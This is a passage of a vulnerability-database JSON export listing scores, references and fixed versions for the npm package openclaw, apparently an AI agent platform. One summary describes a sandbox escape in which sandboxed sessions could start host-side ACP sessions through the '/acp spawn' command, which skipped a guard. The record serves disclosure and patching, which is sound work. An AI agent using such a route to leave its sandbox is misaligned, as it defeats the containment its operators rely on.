ring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-auto-discovery-of-workspace-plugins"},{"reference_url":"https://github.com/advisories/GHSA-j5qh-5234-4rqp","reference_id":"GHSA-j5qh-5234-4rqp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j5qh-5234-4rqp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerabili
ty":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerabili
ty":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerabili
ty":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerabili
ty":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerabili
ty":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-j5qh-5234-4rqp"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hzbt-fbgp-h7fd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50762?format=json","vulnerability_id
":"VCID-j6nj-gf5b-1khk","summary":"OpenClaw: Sandboxed /acp spawn requests could initialize host ACP sessions\nSandboxed requester sessions could reach host-side ACP session initialization through `/acp spawn`.\n\nOpenClaw already blocked `sessions_spawn({ runtime: \"acp\" })` from sandboxed sessions, but the slash-command path initialized ACP directly without applying the same host-runtime guard first.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27646","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03472","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03489","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03475","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27646"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/61000b8e4ded919ca1a825d4700db4cb3fdc56e3","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-25T19:15:20Z/"}],"url":
"https://github.com/openclaw/openclaw/commit/61000b8e4ded919ca1a825d4700db4cb3fdc56e3"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://vulncheck.com/advisories/openclaw-mar-sandbox-escape-via-acp-spawn-command","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-25T19:15:20Z/"}],"url":"https://vulncheck.com/advisories/openclaw-mar-sandbox-escape-via-acp-spawn-command"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27646","reference_id":"CVE-2026-27646","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27646"},{"reference_url":"https://github.com/advisories/GHSA-9q36-67vc-rrwg","reference_id":"GHSA-9q36-67vc-rrwg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"ht
tps://github.com/advisories/GHSA-9q36-67vc-rrwg"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9q36-67vc-rrwg","reference_id":"GHSA-9q36-67vc-rrwg","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-25T19:15:20Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9q36-67vc-rrwg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerabil
ity":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerabil
ity":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerabil
ity":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"v